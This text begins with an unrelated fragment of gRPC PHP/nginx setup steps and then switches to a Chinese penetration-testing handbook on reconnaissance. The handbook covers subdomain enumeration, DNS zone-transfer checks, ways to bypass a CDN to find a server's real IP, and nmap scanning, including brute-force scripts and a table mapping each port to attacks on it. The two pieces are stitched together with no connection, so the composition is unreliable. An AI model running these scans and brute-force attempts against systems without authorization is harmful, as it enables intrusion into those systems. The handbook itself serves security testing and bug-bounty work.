`/etc/php5/fpm/php.ini` ```sh extension=grpc.so ``` Uncomment the following lines in your `/etc/nginx/sites-available/default` file: ``` location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/var/run/php5-fpm.sock; } ``` Restart nginx and php-fpm ```sh $ sudo service nginx restart $ sudo service php5-fpm restart ``` Make sure the Node math server is still running, as above. ```sh $ cd grpc $ npm install $ node src/node/test/math/math_server.js ``` Make sure you have run `composer install` to generate the `vendor/autoload.php` file ```sh $ cd grpc/src/php $ composer install ``` Make sure you have generated the client stubs ```sh $ ./bin/generate_proto_php.sh ``` Copy the `math_client.php` file into your Nginx document root, e.g. ```sh $ cp tests/generated_code/math_client.php /var/www/html ``` You may have to fix the first line to point the includes to your installation: ```php include 'vendor/autoload.php'; ``` Connect to `localhost/math_client.php` in your browser, or run this from command line: ```sh $ curl localhost/math_client.php ``` [Node]:https://github.com/grpc/grpc/tree/master/src/node/examples
# Information Collection For Pentest ## 声明 ``` Author:Qftm Data:2020/01/18 Link:https://github.com/Qftm/Information_Collection_Handbook ``` ## 正文 "只有不努力的黑客,没有攻不破的系统"。 在SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能挖到别人挖不到的洞。 Table of Contents ================= - [收集域名信息](#收集域名信息) - [Whois 查询](#whois-查询) - [备案信息查询](#备案信息查询) - [信用信息查询](#信用信息查询) - [IP反查站点的站](#ip反查站点的站) - [在线网站](#在线网站) - [Dnslytics](#dnslytics) - [浏览器插件](#浏览器插件) - [myip.ms](#myip.ms) - [TCPIPUTILS](#tcpiputils) - [DNSlytics](#dnslytics-1) - [Fofa-view](#fofa-view) - [收集相关应用信息](#收集相关应用信息) - [微信公众号&微博](#微信公众号微博) - [天眼查](#天眼查) - [APP](#app) - [七麦数据](#七麦数据) - [AppStore](#appstore) - [收集子域名信息](#收集子域名信息) - [在线平台](#在线平台) - [第三方平台查询](#第三方平台查询) - [权重综合查询](#权重综合查询) - [全国政府网站基本数据库](#全国政府网站基本数据库) - [IP反查绑定域名网站](#ip反查绑定域名网站) - [资产搜索引擎](#资产搜索引擎) - [Google语法查询](#google语法查询) - [FOFA语法查询](#fofa语法查询) - [工具枚举](#工具枚举) - [OneForAll](#oneforall) - [Layer](#layer) - [subDomainsBrute](#subdomainsbrute) - [Sublist3r](#sublist3r) - [证书透明度公开日志枚举](#证书透明度公开日志枚举) - [在线第三方平台查询](#在线第三方平台查询) - [工具枚举查询](#工具枚举查询) - [Findomain](#findomain) - [DNS历史解析](#dns历史解析) - [DNS域传送漏洞](#dns域传送漏洞) - [DNS记录分类](#dns记录分类) - [DNS注册信息](#dns注册信息) - [DNS域传送漏洞原理](#dns域传送漏洞原理) - [DNS域传送漏洞检测](#dns域传送漏洞检测) - [nslookup](#nslookup) - [nmap](#nmap) - [dig](#dig) - [查找真实IP](#查找真实ip) - [CDN简介](#cdn简介) - [国内外CND](#国内外cnd) - [判断目标是否存在CDN](#判断目标是否存在cdn) - [Ping目标主域](#ping目标主域) - [Nslookup](#nslookup-1) - [不同DNS域名解析](#不同dns域名解析) - [nslookup默认解析](#nslookup默认解析) - [全国Ping](#全国ping) - [站长工具](#站长工具) - [17CE](#ce) - [IPIP](#ipip) - [工具查询](#工具查询) - [Cdnplanet](#cdnplanet) - [绕过CDN查找真实IP](#绕过cdn查找真实ip) - [内部邮箱源](#内部邮箱源) - [国外请求](#国外请求) - [国际Ping](#国际ping) - [国外DNS解析](#国外dns解析) - [分站域名&C段查询](#分站域名c段查询) - [分站域名](#分站域名) - [C段查询](#c段查询) - [网站漏洞](#网站漏洞) - [一些测试文件](#一些测试文件) - [SSRF漏洞](#ssrf漏洞) - [查询域名解析记录](#查询域名解析记录) - [目标网站APP应用](#目标网站app应用) - [网络空间引擎搜索](#网络空间引擎搜索) - [收集常用端口信息](#收集常用端口信息) - [常见端口&解析&总结](#常见端口解析总结) - [扫描工具](#扫描工具) - [常用扫描工具](#常用扫描工具) - [常用扫描工具使用](#常用扫描工具使用) - [nmap](#nmap-1) - [Masscan](#masscan) - [Zmap](#zmap) - [御剑高速TCP端口扫描工具](#御剑高速tcp端口扫描工具) - [御剑高速端口扫描工具](#御剑高速端口扫描工具) - [masnmapscan](#masnmapscan) - [网络空间引擎搜索](#网络空间引擎搜索-1) - [浏览器插件](#浏览器插件-1) - [Shodan](#shodan) - [TCPIPUTILS](#tcpiputils-1) - [DNSlytics](#dnslytics-2) - [指纹识别](#指纹识别) - [第三方平台](#第三方平台) - [工具](#工具) - [浏览器插件](#浏览器插件-2) - [Wappalyzer](#wappalyzer) - [收集敏感信息](#收集敏感信息) - [WAF识别](#waf识别) - [wafw00f](#wafw00f) - [源码泄露](#源码泄露) - [常见源码泄露](#常见源码泄露) - [源码泄露扫描工具](#源码泄露扫描工具) - [源码泄露利用工具](#源码泄露利用工具) - [备份文件泄露](#备份文件泄露) - [网站备份文件泄露常见名称](#网站备份文件泄露常见名称) - [网站备份文件泄露常见后缀](#网站备份文件泄露常见后缀) - [网站备份文件泄露扫描工具](#网站备份文件泄露扫描工具) - [Google Hacking](#google-hacking) - [常用GoogleHacking语法](#常用googlehacking语法) - [其他GoogleHacking语法](#其他googlehacking语法) - [GoogleHacking典型用法](#googlehacking典型用法) - [JS获取敏感接口](#js获取敏感接口) - [JSFinder](#jsfinder) - [LinkFinder](#linkfinder) - [目录&后台扫描](#目录后台扫描) - [越权查询](#越权查询) - [代码托管](#代码托管) - [Whois&备案查询](#whois备案查询) - [公网网盘](#公网网盘) - [凌风云搜索](#凌风云搜索) - [小白盘搜索](#小白盘搜索) - [大力盘搜索](#大力盘搜索) - [小不点搜索(微盘)](#小不点搜索(微盘)) - [百度网盘爬取开源工具](#百度网盘爬取开源工具) - [网站截图](#网站截图) - [webscreenshot](#webscreenshot) - [获取公开文件](#获取公开文件) - [snitch](#snitch) - [Google Hacking](#google-hacking-1) - [邮箱信息收集](#邮箱信息收集) - [Infoga](#infoga) - [Google Hacking](#google-hacking-2) - [历史漏洞&资产](#历史漏洞资产) - [历史漏洞](#历史漏洞) - [历史资产](#历史资产) - [wayback](#wayback) # 收集域名信息 知道目标域名之后,我们要做的第一件事情就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。 ## Whois 查询 Whois 简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期、DNS等)。通过域名Whois服务器查询,可以查询域名归属者联系方式,以及注册和到期时间。 ``` Kali下whois查询 https://www.kali.org/downloads/ 域名Whois查询 - 站长之家 http://whois.chinaz.com/ Whois 爱站 http://whois.aizhan.com/ ip138 https://site.ip138.com/ Whois Lookup https://www.whois.net/ ICANN Lookup https://lookup.icann.org/ 域名信息查询 - 腾讯云https://whois.cloud.tencent.com/domain?domain= nicolasbouliane http://nicolasbouliane.com/utils/whois/?url=http://baidu.com 新网 whois信息查询 http://whois.xinnet.com/ IP WHOIS查询 - 站长工具 http://tool.chinaz.com/ipwhois/ ``` ![](img/1594459-20200119141241842-1090421140.png) ## 备案信息查询 国内网站注册需要向国家有关部门申请备案,防止网站从事非法活动,而国外网站不需要备案2333。 ``` ICP备案查询网 http://www.beianbeian.com/ ICP备案查询 - 站长工具 http://icp.chinaz.com/ SEO综合查询 - 爱站 https://www.aizhan.com/seo/ 批量查询 - 站长工具 http://icp.chinaz.com/searchs 工业和信息化部ICP/IP/域名信息备案管理 http://www.beian.miit.gov.cn/publish/query/indexFirst.action ``` ![](img/1594459-20200119141328662-1538613661.png) ## 信用信息查询 国家企业信用信息公示系统 http://www.gsxt.gov.cn/index.html 全国企业信息查询 http://company.xizhi.com/ 个人信用查询搜索-企业信息查询搜索-统一社会信用代码查询-信用中国 https://www.creditchina.gov.cn/ ![](img/1594459-20200119141415498-1786131287.png) ## IP反查站点的站 ### 在线网站 #### Dnslytics Dnslytics地址:https://dnslytics.com/ 利用Dnslytics反查IP可以得到如下信息 ``` IP information Network information Hosting information SPAM database lookup Open TCP/UDP ports Blocklist lookup Whois information Geo information Country information Update information ``` 利用Dnslytics反查域名可以得到如下信息 ``` Domain and Ranking Information Hosting Information{ A / AAAA Record NS Record MX Record SPF Record } Web Information Whois Information ``` ## 浏览器插件 通过Google、FireFox等插件的使用,收集域名信息 ### myip.ms ![](img/1594459-20200119141519415-625881985.png) ### TCPIPUTILS ![](img/1594459-20200119141640228-860131966.png) ### DNSlytics ![](img/1594459-20200119141656601-1094084026.png) ## fofa-view ![](img/1594459-20200119162240355-550566949.png) # 收集相关应用信息 天眼查 https://www.tianyancha.com/ 企查查 https://www.qichacha.com/ ## 微信公众号&微博 ### 天眼查 根据前面获取的企业名称可以获取目标企业的微信公众号、微博、备案站点、软件著作权等信息。 天眼查-商业安全工具 https://www.tianyancha.com/ ![](img/1594459-20200119141713825-233472966.png) 微信公众号 ![](img/1594459-20200119141726618-1965423664.png) 微博 ![](img/1594459-20200119141739367-2099794631.png) ## APP ### 七麦数据 https://www.qimai.cn/ 通过当前APP查询同开发商应用,得到目标所有APP应用 ![](img/1594459-20200119141752877-1887884798.png) ### AppStore https://apps.apple.com/ 通过当前APP查询同开发商应用,得到目标所有APP应用 ![](img/1594459-20200119141813027-1838023080.png) # 收集子域名信息 子域名也就是二级域名,是指顶级域名下的域名。假设我们的目标网络规模比较大,直接从主域入手显然是很不理智的,因为对于这种规模的目标,一般其主域都是重点防护区域,所以不如先进入目标的某个子域,然后再想办法迂回接近真正的目标,这无疑是个比较好的选择。那么问题来了,怎样才能尽可能多地搜集目标的高价值子域呢?常用的方法有以下这几种。 ## 在线平台 ### 第三方平台查询 主要是一些第三方网站和一些博主提供的服务 ``` ip138 https://site.ip138.com/ 站长工具 http://tool.chinaz.com/subdomain/?domain= hackertarget https://hackertarget.com/find-dns-host-records/ phpinfo https://phpinfo.me/domain/ t1h2ua https://www.t1h2ua.cn/tools/ dnsdumpster https://dnsdumpster.com/ chinacycc https://d.chinacycc.com/ zcjun http://z.zcjun.com/ ``` ### 权重综合查询 爱站 https://www.aizhan.com/seo/ 站长工具 http://rank.chinaz.com/all/ ![](img/1594459-20200119141832218-1345938531.png) ### 全国政府网站基本数据库 http://114.55.181.28/databaseInfo/index ![](img/1594459-20200119141843251-1646076497.png) ### IP反查绑定域名网站 IP关联域名,大部分网站一个IP多个域名 ``` http://s.tool.chinaz.com/same?s http://dns.aizhan.com/ https://webscan.cc/ ``` ## 资产搜索引擎 google、shodan、FOFA、zoomeye ### Google语法查询 搜索子域名 "site:xxxxx" ``` site:baidu.com ``` ![](img/1594459-20200119141902637-725688631.png) ### FOFA语法查询 https://fofa.so/ 搜索子域名 "domain:xxxxx" ``` domain="baidu.com" ``` ![](img/1594459-20200119141919931-1425149530.png) ## 工具枚举 常用子域名工具如下(Github上都可搜到) ``` OneForAll Layer Sublist3r subDomainsBrute K8 wydomain dnsmaper dnsbrute Findomain fierce等 ``` 个人推荐:`OneForAll`、`Layer`、`Sublist3r`、`subDomainsBrute` ### OneForAll OneForAll是一款功能强大的子域收集工具,拥有多个模块和接口扫描,收集子域信息很全,包括子域、子域IP、子域常用端口、子域Title、子域Banner、子域状态等。 项目地址:`https://github.com/shmilylty/OneForAll` 子域名收集:`python3 oneforall.py --target=target.com run` ![](img/1594459-20200119141949690-706245006.png) ### Layer Layer子域名挖掘机的使用方法比较简单,在域名对话框中直接输入域名就可以进行扫描,它的显示界面比较细致,有域名、解析IP、开放端口、Web服务器和网站状态等 ![](img/1594459-20200119142000597-497061730.png) ### subDomainsBrute subDomainsBrute的特点是可以用小字典递归地发现三级域名、四级域名,甚至五级域名等不容易被探测到的域名。 项目地址:`https://github.com/lijiejie/subDomainsBrute` 子域名收集:`python subDomainsbrute.py xtarget.com` ### Sublist3r Sublist3r也是一个比较常用的工具, 它能列举多种资源,如在Google、Yahoo、 Bing、 Baidu和Ask等搜索引擎中可查到的子域名,还可以列出Netcraft、VirusTotal、ThreatCrowd、 DNSdumpster、SSL Certificates、和Reverse DNS查到的子域名。 项目地址:`https://github.com/aboul3la/Sublist3r` 子域名收集:`python sublist3r.py -d target.com -b -t 50 -p 80,443,21,22` ![](img/1594459-20200119142016505-176536179.png) ## 证书透明度公开日志枚举 证书透明度(Certificate Transparency, CT)是证书授权机构(CA) 的一个项目,证书授权机构会将每个SSL/TLS证书发布到公共日志中。一个SSL/TLS证书通常包含域名、子域名和邮件地址, 这些也经常成为攻击者非常希望获得的有用信息。查找某个域名所属证书的最简单的方法就是使用搜索引|擎搜索一些公开的CT日志。 ### 在线第三方平台查询 ``` crt.sh: https://crt.sh censys: https://censys.io myssl:https://myssl.com ``` ``` crt: https://crt.sh/?q=baidu.com ``` ![](img/1594459-20200119142032842-592842557.png) ![](img/1594459-20200119142046971-121764509.png) ``` censys: https://www.censys.io/certificates?q=baidu.com ``` ![](img/1594459-20200119142058672-37856097.png) ### 工具枚举查询 通过工具可以调用各个证书接口进行域名查询 常用工具 ``` Findomain Sublist3r(SSL Certificates)等 ``` #### Findomain Findomain不使用子域名寻找的常规方法,而是使用证书透明度日志来查找子域,并且该方法使其工具更加快速和可靠。该工具使用多个公共API来执行搜索: ``` Certspotter Crt.sh Virustotal Sublist3r Facebook Spyse (CertDB) Bufferover Threadcrow Virustotal with apikey ``` 项目地址:`https://github.com/Edu4rdSHL/findomain` 子域名收集:`findomain -t target.com ` 使用所有API搜索子域并将数据导出到CSV文件:`findomain -t target.com -a -o csv` ## DNS历史解析 dnsdb https://www.dnsdb.io viewdns https://viewdns.info/ ## DNS域传送漏洞 目前来看"DNS域传送漏洞"已经很少了。 ### DNS记录分类 常见的DNS记录有以下几类: ``` A记录 IP地址记录,记录一个域名对应的IP地址 AAAA记录 IPv6地址记录,记录一个域名对应的IPv6地址 CNAME记录 别名记录,记录一个主机的别名 MX记录 电子邮件交换记录,记录一个邮件域名对应的IP地址 NS记录 域名服务器记录 ,记录该域名由哪台域名服务器解析 PTR记录 反向记录,也即从IP地址到域名的一条记录 TXT记录 记录域名的相关文本信息 ``` ### DNS注册信息 Whois查询 ### DNS域传送漏洞原理 DNS服务器分为:`主服务器`、`备份服务器`和`缓存服务器`。在主备服务器之间同步数据库,需要使用`“DNS域传送”`。域传送是指备份服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。 若DNS服务器配置不当,可能导致攻击者获取某个域的所有记录。造成整个网络的拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器。同时,黑客可以快速的判定出某个特定zone的所有主机,收集域信息,选择攻击目标,找出未使用的IP地址,绕过基于网络的访问控制。 ### DNS域传送漏洞检测 #### nslookup 基本过程 ``` 1) nslookup #进入交互式shell 2) server dns.xx.yy.zz #设定查询将要使用的DNS服务器 3) ls xx.yy.zz #列出某个域中的所有域名 4) exit #退出 ``` 漏洞检验-不存在漏洞 ``` > nslookup Server: lkwifi.cn Address: 192.168.68.1 *** lkwifi.cn can't find nslookup: Non-existent domain > server ss2.bjfu.edu.cn Default Server: ss2.bjfu.edu.cn Address: 202.204.112.67 > ls bjfu.edu.cn [ss2.bjfu.edu.cn] *** Can't list domain bjfu.edu.cn: Query refused The DNS server refused to transfer the zone bjfu.edu.cn to your computer. If this is incorrect, check the zone transfer security settings for bjfu.edu.cn on the DNS server at IP address 202.204.112.67. > exit ``` 漏洞检验-存在漏洞 ``` > nslookup > server dns1.xxx.edu.cn > ls xxx.edu.cn ``` ![](img/1594459-20200119142122378-365876425.png) #### nmap 利用nmap漏洞检测脚本"dns-zone-transfer"进行检测 ``` nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxx.edu.cn -p 53 -Pn dns.xxx.edu.cn ``` ``` --script dns-zone-transfer 表示加载nmap漏洞检测脚本dns-zone-transfer.nse,扩展名.nse可省略 --script-args dns-zone-transfer.domain=xxx.edu.cn 向脚本传递参数,设置列出某个域中的所有域名 -p 53 设置扫描53端口 -Pn 设置通过Ping发现主机是否存活 ``` ![](img/1594459-20200119142135615-565066925.png) #### dig 使用说明 `dig -h` 漏洞测试 ``` dig @dns.xxx.edu.cn axfr xxx.edu.cn ``` `axfr` 是q-type类型的一种: axfr类型是Authoritative Transfer的缩写,指请求传送某个区域的全部记录。 ![](img/1594459-20200119142148997-23789284.png) # 查找真实IP 如果挖掘的目标购买了CDN服务,可以直接ping目标的域名,但得到的并非真正的目标Web服务器,只是离我们最近的一台目标节点的CDN服务器,这就导致了我们没法直接得到目标的真实IP段范围。 ## CDN简介 CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。 ## 国内外CND 国内常见CDN ``` 阿里云 腾讯云 百度云 网宿科技(ChinanNet Center) 蓝汛 金山云 UCloud 网易云 世纪互联 七牛云 京东云等 ``` 国外常见CDN ``` Akamai(阿卡迈) Limelight Networks(简称LLNW) AWS Cloud(亚马逊) Google(谷歌) Comcast(康卡斯特) ``` ## 判断目标是否存在CDN 由于CDN需要代价,一般小企业很大几率不会存在CDN服务。 假如一些企业存在CDN服务,那该如何寻找其真实IP呢,往下看,常见几种手法 ### Ping目标主域 通常通过ping目标主域,观察域名的解析情况,以此来判断其是否使用了CDN 对京东和阿里还有一家电器企业进行ping测试,观察域名的解析情况,可以看到京东和阿里都采用了自家CDN,而那个电器企业没有CDN服务 ``` C:\Users\Qftm>ping www.jd.com C:\Users\Qftm>ping www.alibaba.com C:\Users\Qftm>ping www.dfle.com.cn ``` ![](img/1594459-20200119142212459-2087766300.png) ### Nslookup #### 不同DNS域名解析 不同DNS域名解析情况对比,判断其是否使用了CDN 不同DNS解析结果若不一样,很有可能存在CDN服务 ``` C:\Users\Qftm>nslookup www.dfle.com.cn 8.8.8.8 C:\Users\Qftm>nslookup www.dfle.com.cn 114.114.114.114 ``` ![](img/1594459-20200119142328428-196307471.png) ``` λ Qftm >>>: nslookup www.baidu.com 8.8.8.8 λ Qftm >>>: nslookup www.baidu.com 114.114.114.114 ``` ![](img/1594459-20200119142343947-148948923.png) #### nslookup默认解析 若解析结果有多个,很有可能存在CDN,相反,若解析结果有一个,可能不存在CDN(不能肯定) ![](img/1594459-20200119142357248-1150922309.png) ### 全国Ping 利用全国多地区的ping服务器操作,然后对比每个地区ping出的IP结果,查看这些IP是否一致, 如果都是一样的,极有可能不存在CDN。如果IP大多不太一样或者规律性很强,可以尝试查询这些IP的归属地,判断是否存在CDN。 在线网址 ``` Ping检测-站长工具 http://ping.chinaz.com/ 17CE https://www.17ce.com/ ipip https://tools.ipip.net/newping.php (支持国内、国外) ``` #### 站长工具 测试目标:`www.jd.com` ![](img/1594459-20200119142412648-1190613587.png) #### 17CE 测试目标:`www.baidu.com` ![](img/1594459-20200119142428869-1621577710.png) #### IPIP ![](img/1594459-20200119142440363-2056134896.png) ### 工具查询 这里工具只能作为辅助,有一定误报的概率,只能作为参考 #### Cdnplanet cdnplanet https://www.cdnplanet.com/tools/cdnfinder/ (查询可能比较慢) ![](img/1594459-20200119142452928-266810115.png) ## 绕过CDN查找真实IP 在确认了目标确实用了CDN以后,就需要绕过CDN寻找目标的真实IP,下面介绍一些常规的方法。 ### 内部邮箱源 一般的邮件系统都在内部,没有经过CDN的解析,通过利用目标网站的邮箱注册、找回密码或者RSS订阅等功能,查看邮件、寻找邮件头中的邮件服务器域名IP,ping这个邮件服务器的域名,就可以获得目标的真实IP。 注意:必须是目标自己的邮件服务器,第三方或公共邮件服务器是没有用的。 ![](img/1594459-20200119142511035-408073430.png) ### 国外请求 很多时候国内的CDN对国外得覆盖面并不是很广,故此可以利用此特点进行探测。通过国外代理访问就能查看真实IP了,或者通过国外的DNS解析,可能就能得到真实的IP。 #### 国际Ping 国际ping测试站点 ``` ipip https://tools.ipip.net/newping.php ASM https://asm.ca.com/en/ping.php ``` 测试站点:`www.yeah.net` ![](img/1594459-20200119142526549-567642204.png) #### 国外DNS解析 世界各地DNS服务器地址大全:`http://www.ab173.com/dns/dns_world.php` 测试站点:`www.yeah.net` 美国加利福尼亚州山景市谷歌公司DNS服务器: `8.8.4.4` ![](img/1594459-20200119142541360-1030049461.png) ### 分站域名&C段查询 很多网站主站的访问量会比较大,所以主站都是挂CDN的,但是分站可能没有挂CDN,可以通过ping二级域名获取分站IP, 可能会出现分站和主站不是同一个IP但在同一个C段下面的情况,从而能判断出目标的真实IP段。 #### 分站域名 具体见上面**<收集子域名信息>**部分 ![](img/1594459-20200119142552726-920748840.png) #### C段查询 * 在线查询 ``` https://phpinfo.me/bing.php ``` ![](img/1594459-20200119142607848-1081123689.png) * 工具 `K8_C段旁注工具6.0`、`nmap`、`IISPutScanner`、`小米范WEB查找器` 等 `小米范WEB查找器`:http://pan.baidu.com/s/1pLjaQKF ![](img/1594459-20200119142618307-1998638289.png) * 网络资产搜索引擎 Fofa、Shodan、ZoomEye 利用这些网络空间资产搜索引擎来搜索暴露在外的端口信息 利用语法搜索C段信息 ![](img/1594459-20200119142628605-1817173510.png) ### 网站漏洞 通过网站的信息泄露如phpinfo泄露,github信息泄露,命令执行等漏洞获取真实ip。 #### 一些测试文件 phpinfo、test等 ![](img/1594459-20200119142643031-2126170556.png) #### SSRF漏洞 服务器主动向外发起连接,找到真实IP地址 ### 查询域名解析记录 一般网站从部署开始到使用cdn都有一个过程,周期如果较长的话 则可以通过这类历史解析记录查询等方式获取源站ip,查看IP与域名绑定的历史记录,可能会存在使用CDN前的记录。 在线网站查询 ``` dnsdb https://www.dnsdb.io NETCRAFT https://sitereport.netcraft.com/?url= viewdns https://viewdns.info/ threatbook https://x.threatbook.cn/ securitytrails https://securitytrails.com/ ``` ![](img/1594459-20200119142656200-2052041466.png) ### 目标网站APP应用 如果目标网站有自己的App,可以尝试利用Fiddler或Burp Suite抓取App的请求,从里面找到目标的真实IP。 ### 网络空间引擎搜索 shodan、FOFA、zoomeye # 收集常用端口信息 在对目标进行漏洞挖掘的过程中,对端口信息的收集是一个很重要的过程, 通过扫描服务器开放的端口以及从该端口判断服务器上存在的服务,就可以对症下药,便于我们渗透目标服务器。 所以在端口渗透信息的收集过程中,我们需要关注常见应用的默认端口和在端口上运行的服务。 端口一般是指TCP/IP协议中的端口,端口号的范围是从0-65535。 ## 常见端口&解析&总结 常用的端口利用及解析总结 ``` 端口:21 服务:FTP/TFTP/VSFTPD 总结:爆破/嗅探/溢出/后门 端口:22 服务:ssh远程连接 总结:爆破/openssh漏洞 端口:23 服务:Telnet远程连接 总结:爆破/嗅探/弱口令 端口:25 服务:SMTP邮件服务 总结:邮件伪造 端口:53 服务:DNS域名解析系统 总结:域传送/劫持/缓存投毒/欺骗 端口:67/68 服务:dhcp服务 总结:劫持/欺骗 端口:110 服务:pop3 总结:爆破/嗅探 端口:139 服务:Samba服务 总结:爆破/未授权访问/远程命令执行 端口:143 服务:Imap协议 总结:爆破161SNMP协议爆破/搜集目标内网信息 端口:389 服务:Ldap目录访问协议 总结:注入/未授权访问/弱口令 端口:445 服务:smb 总结:ms17-010/端口溢出 端口:512/513/514 服务:Linux Rexec服务 总结:爆破/Rlogin登陆 端口:873 服务:Rsync服务 总结:文件上传/未授权访问 端口:1080 服务:socket 总结:爆破 端口:1352 服务:Lotus domino邮件服务 总结:爆破/信息泄漏 端口:1433 服务:mssql 总结:爆破/注入/SA弱口令 端口:1521 服务:oracle 总结:爆破/注入/TNS爆破/反弹shell2049Nfs服务配置不当 端口:2181 服务:zookeeper服务 总结:未授权访问 端口:2375 服务:docker remote api 总结:未授权访问 端口:3306 服务:mysql 总结:爆破/注入 端口:3389 服务:Rdp远程桌面链接 总结:爆破/shift后门 端口:4848 服务:GlassFish控制台 总结:爆破/认证绕过 端口:5000 服务:sybase/DB2数据库 总结:爆破/注入/提权 端口:5432 服务:postgresql 总结:爆破/注入/缓冲区溢出 端口:5632 服务:pcanywhere服务 总结:抓密码/代码执行 端口:5900 服务:vnc 总结:爆破/认证绕过 端口:6379 服务:Redis数据库 总结:未授权访问/爆破 端口:7001/7002 服务:weblogic 总结:java反序列化/控制台弱口令 端口:80/443 服务:http/https 总结:web应用漏洞/心脏滴血 端口:8069 服务:zabbix服务 总结:远程命令执行/注入 端口:8161 服务:activemq 总结:弱口令/写文件 端口:8080/8089 服务:Jboss/Tomcat/Resin 总结:爆破/PUT文件上传/反序列化 端口:8083/8086 服务:influxDB 总结:未授权访问 端口:9000 服务:fastcgi 总结:远程命令执行 端口:9090 服务:Websphere 总结:控制台爆破/java反序列化/弱口令 端口:9200/9300 服务:elasticsearch 总结:远程代码执行 端口:11211 服务:memcached 总结:未授权访问 端口:27017/27018 服务:mongodb 总结:未授权访问/爆破 ``` 详细参考:[掘安攻防实验室](https://mp.weixin.qq.com/s/Y0PPqyHysBPmgmDw2KmHYw) ## 扫描工具 ### 常用扫描工具 ``` Nmap Masscan ZMap 御剑高速TCP端口扫描工具 御剑高速端口扫描工具 IISPutScanner IISPutScanner增强版-DotNetScan v1.1 Beta masnmapscan ``` ### 常用扫描工具使用 #### nmap 项目地址:`https://github.com/nmap/nmap` * 扫描多个IP ``` 扫描整个子网 nmap 192.168.6.1/24 nmap 192.168.1.1/16 nmap 192.168.1-30.1-254 nmap 192.168.1-254.6 扫描多个主机 namp 192.168.6.2 192.168.6.6 扫描一个小范围 nmap 192.168.6.2-10 扫描txt内的ip列表 nmap -iL text.txt 扫描除某个目标外 nmap 192.168.6.1/24 -exclude 192.168.6.25 ``` * 绕过Firewalld扫描主机端口 通过不同的协议(TCP半连接、TCP全连接、ICMP、UDP等)的扫描绕过Firewalld的限制 ``` nmap -sP 192.33.6.128 nmap -sT 192.33.6.128 nmap -sS 192.33.6.128 nmap -sU 192.33.6.128 nmap -sF 192.33.6.128 nmap -sX 192.33.6.128 nmap -sN 192.33.6.128 ``` * 初步扫描端口信息 ``` nmap -T4 -A -v -Pn 192.168.1.1/24 -p 21,22,23,25,80,81,82,83,88,110,143,443,445,512,513,514,1433,1521,2082,2083,2181,2601,2604,3128,3306,3389,3690,4848,5432,5900,5984,6379,7001,7002,8069,8080,8081,8086,8088,9200,9300,11211,10000,27017,27018,50000,50030,50070 -oN nmap_result.txt ``` ![](img/1594459-20200119150735085-1154381786.png) * 扫描端口并且标记可以爆破的服务 ``` nmap 127.0.0.1 --script=ftp-brute,imap-brute,smtp-brute,pop3-brute,mongodb-brute,redis-brute,ms-sql-brute,rlogin-brute,rsync-brute,mysql-brute,pgsql-brute,oracle-sid-brute,oracle-brute,rtsp-url-brute,snmp-brute,svn-brute,telnet-brute,vnc-brute,xmpp-brute ``` ![](img/1594459-20200119142721442-1575053305.png) * 判断常见的漏洞并扫描端口 ``` nmap 127.0.0.1 --script=auth,vuln ``` ![](img/1594459-20200119142731949-1278292617.png) * 精确判断漏洞并扫描端口 ``` nmap 127.0.0.1 --script=dns-zone-transfer,ftp-anon,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,http-backup-finder,http-cisco-anyconnect,http-iis-short-name-brute,http-put,http-php-version,http-shellshock,http-robots.txt,http-svn-enum,http-webdav-scan,iis-buffer-overflow,iax2-version,memcached-info,mongodb-info,msrpc-enum,ms-sql-info,mysql-info,nrpe-enum,pptp-version,redis-info,rpcinfo,samba-vuln-cve-2012-1182,smb-vuln-ms08-067,smb-vuln-ms17-010,snmp-info,sshv1,xmpp-info,tftp-enum,teamspeak2-version ``` #### Masscan 项目地址:`https://github.com/robertdavidgraham/masscan` Masscan主要是真对全网进行端口扫描 #### Zmap 项目地址:`https://github.com/zmap/zmap` Zmap主要是真对全网进行端口扫描 #### 御剑高速TCP端口扫描工具 ![](img/1594459-20200119142744950-434617774.png) #### 御剑高速端口扫描工具 ![](img/1594459-20200119142757545-1040489796.png) #### masnmapscan 项目地址:`https://github.com/hellogoldsnakeman/masnmapscan-V1.0` masnmapscan整合了masscan和nmap两款扫描器,masscan扫描端口,nmap扫描端口对应服务,二者结合起来实现了又快又好地扫描。并且加入了针对目标资产有防火墙的应对措施。 ### 网络空间引擎搜索 shodan、FOFA、zoomeye FOFA为例 https://fofa.so/ ![](img/1594459-20200119142808985-1292014262.png) ### 浏览器插件 通过Google、FireFox等插件的使用,收集主机端口开放信息 #### Shodan ![](img/1594459-20200119142819024-1802418948.png) #### TCPIPUTILS ![](img/1594459-20200119142829090-1787287221.png) #### DNSlytics. ![](img/1594459-20200119142839382-1486144346.png) # 指纹识别 在漏洞挖掘中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。 CMS (Content Management System)又称整站系统或文章系统。常见的CMS有Dedecms (织梦)、Discuz、 PHPWEB、 PHPWind、PHPCMS、ECShop、 Dvbbs、 SiteWeaver、 ASPCMS、帝国、Z- Blog、WordPress等。 ## 第三方平台 云悉 http://www.yunsee.cn/ TideFinger http://finger.tidesec.net/ BugScaner http://whatweb.bugscaner.com/look/ 数字观星 https://fp.shuziguanxing.com/#/ ![](img/1594459-20200119142854987-277705405.png) ## 工具 常用指纹识别工具有:`御剑Web指纹识别`、`WhatWeb`、`Test404轻量CMS指纹识别+v2.1`、`椰树`等,可以快速识别一些主流CMS ![](img/1594459-20200119142905515-1626640337.png) Github项目 ``` [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) [CMSmap](https://github.com/Dionach/CMSmap) [ACMSDiscovery](https://github.com/aedoo/ACMSDiscovery) [TideFinger](https://github.com/TideSec/TideFinger) [AngelSword](https://github.com/Lucifer1993/AngelSword) ``` 